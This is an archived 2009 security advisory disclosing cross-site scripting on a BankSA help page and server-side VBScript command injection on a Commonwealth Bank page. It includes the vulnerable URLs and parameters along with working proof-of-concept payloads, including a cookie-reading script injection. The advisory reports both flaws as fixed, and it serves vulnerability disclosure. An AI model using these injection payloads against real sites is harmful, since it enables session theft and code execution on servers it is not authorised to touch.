AOH :: HP Unsorted S :: VA3440.HTM

Security Advisory: Banks in Australia



Security Advisory: Banks in Australia
Security Advisory: Banks in Australia



==============================================
Security Advisory: Banks in Australia

militan (Chia-Jun Lin)
militan.c7@gmail.com
adl.csie.ncu.edu.tw/~militan
militan-c7.blogspot.com
Advanced Defense Lab(ADL), NCU CSIE TAIWAN
7th May, 2009
==============================================


I. VULNERABILITY
-------------------------
XSS
Command Injection

Banks below are vulnerable:
BankSA. www.banksa.com.au
Commonwealth Bank. www.commbank.com.au
etc...

II. DESCRIPTION
-------------------------
Some banks contain vulnerabilities in certain pages, which may be misused by attackers.
Via the command injection, attackers can execute any vbscript command on the hosts.

Generally, the security mechanism of the websites of banks in AU are implemented indeed,
However, their complex architectures are unnecessary actually.
Due to the large architectures, some pages do not perform the validation properly.


III. Detail & POC
------------------------
1. BankSA: XSS. Javascript Injection.
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
The BBO function means "Business banking online", and the vulnerable variable is "origin".

If origin=CBS, the page will immediately redirect to the link below.
www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS

Nevertheless, if origin=CBS" then the page would redirect inappropriately.
****javascript code generated in the intermediate page
function focusWin()
{
  window.focus();
  //var theUrl = window.location.pathname;
  //var pos = theUrl.indexOf("help.asp");
  //theUrl = theUrl.substr(0,pos);
window.location.href = "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"";
//document.write("http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"");
}
window.onload = focusWin;
****

Exploit:
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);//
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}%0a%0a
POC:
http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg


2. Commonwealth Bank: ASP command injection (server-side vbscript injection)
The commbank provides lots of tools to calculate, or to evaluate the financial plan.
This page would collect personal information and make an appointment, and almost all the parameters are manipulated in vbscript on server.
www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp

Moreover, the page will return the error message when you mangle the parameters.
Thus attackers can craft the exploit easily,
then arbitrary vbscript commands can be executed on server.

Exploit:
post parameter: Whattodo (default: FillForm)
FillForm & Response.write("ccccc")'
FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '
POC:
http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg

http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg



IV. SOLUTION& CONCLUSION
-------------------------
Most banks in AU should reduce the enormous architecture of their website:
do not provide additional functions or make sure that these functions are secure.

The vulnerabilities have been fixed already.



regards
--
militan
Advanced Defense Lab, NCU Taiwan

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.